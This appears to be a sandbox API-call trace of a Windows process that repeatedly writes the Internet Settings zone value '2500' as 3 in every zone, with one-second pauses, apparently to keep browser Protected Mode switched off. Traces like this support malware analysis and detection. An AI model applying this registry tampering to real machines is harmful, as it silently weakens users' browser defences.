	[0119.756] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.756] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.756] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.756] RegCloseKey (hKey=0x698) returned 0x0
	[0119.756] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.756] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.756] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.756] RegCloseKey (hKey=0x698) returned 0x0
	[0119.756] Sleep (dwMilliseconds=0x3e8) 
	[0119.758] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.758] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.758] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.758] RegCloseKey (hKey=0x698) returned 0x0
	[0119.758] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.758] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.758] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.758] RegCloseKey (hKey=0x698) returned 0x0
	[0119.758] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.758] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.758] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.758] RegCloseKey (hKey=0x698) returned 0x0
	[0119.758] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.758] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.758] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.759] RegCloseKey (hKey=0x698) returned 0x0
	[0119.759] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.759] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.759] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.759] RegCloseKey (hKey=0x698) returned 0x0
	[0119.759] Sleep (dwMilliseconds=0x3e8) 
	[0119.760] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.760] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.760] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.761] RegCloseKey (hKey=0x698) returned 0x0
	[0119.761] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.761] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.761] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.761] RegCloseKey (hKey=0x698) returned 0x0
	[0119.761] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.761] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.761] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.761] RegCloseKey (hKey=0x698) returned 0x0
	[0119.761] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.761] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.761] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.761] RegCloseKey (hKey=0x698) returned 0x0
	[0119.762] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.762] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.762] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.762] RegCloseKey (hKey=0x698) returned 0x0
	[0119.762] Sleep (dwMilliseconds=0x3e8) 
	[0119.763] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.763] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.763] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.763] RegCloseKey (hKey=0x698) returned 0x0
	[0119.763] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.763] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.763] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.763] RegCloseKey (hKey=0x698) returned 0x0
	[0119.763] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.763] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.764] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.764] RegCloseKey (hKey=0x698) returned 0x0
	[0119.764] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.764] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.764] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.764] RegCloseKey (hKey=0x698) returned 0x0
	[0119.764] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.764] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.764] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.764] RegCloseKey (hKey=0x698) returned 0x0
	[0119.764] Sleep (dwMilliseconds=0x3e8) 
	[0119.783] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.783] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.783] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.783] RegCloseKey (hKey=0x698) returned 0x0
	[0119.783] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.783] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.784] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.784] RegCloseKey (hKey=0x698) returned 0x0
	[0119.784] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.784] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.784] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.784] RegCloseKey (hKey=0x698) returned 0x0
	[0119.784] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.784] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.784] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.784] RegCloseKey (hKey=0x698) returned 0x0
	[0119.784] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.784] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.784] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.784] RegCloseKey (hKey=0x698) returned 0x0
	[0119.784] Sleep (dwMilliseconds=0x3e8) 
	[0119.786] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.786] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.787] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.787] RegCloseKey (hKey=0x698) returned 0x0
	[0119.787] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.787] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.787] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.787] RegCloseKey (hKey=0x698) returned 0x0
	[0119.787] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.787] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.787] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.787] RegCloseKey (hKey=0x698) returned 0x0
	[0119.787] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.787] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.787] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.787] RegCloseKey (hKey=0x698) returned 0x0
	[0119.787] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.787] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.788] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.788] RegCloseKey (hKey=0x698) returned 0x0
	[0119.788] Sleep (dwMilliseconds=0x3e8) 
	[0119.789] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.789] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.789] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.790] RegCloseKey (hKey=0x698) returned 0x0
	[0119.790] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.790] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.790] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.790] RegCloseKey (hKey=0x698) returned 0x0
	[0119.790] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.790] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.790] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.790] RegCloseKey (hKey=0x698) returned 0x0
	[0119.790] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.790] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.790] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.790] RegCloseKey (hKey=0x698) returned 0x0
	[0119.790] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.790] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.790] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.790] RegCloseKey (hKey=0x698) returned 0x0
	[0119.790] Sleep (dwMilliseconds=0x3e8) 
	[0119.794] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.794] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.794] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.794] RegCloseKey (hKey=0x698) returned 0x0
	[0119.794] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.794] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.814] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.814] RegCloseKey (hKey=0x698) returned 0x0
	[0119.814] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.814] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.814] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.815] RegCloseKey (hKey=0x698) returned 0x0
	[0119.815] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.815] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.815] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.815] RegCloseKey (hKey=0x698) returned 0x0
	[0119.815] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.815] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.815] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.815] RegCloseKey (hKey=0x698) returned 0x0
	[0119.815] Sleep (dwMilliseconds=0x3e8) 
	[0119.834] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.834] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.835] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.835] RegCloseKey (hKey=0x698) returned 0x0
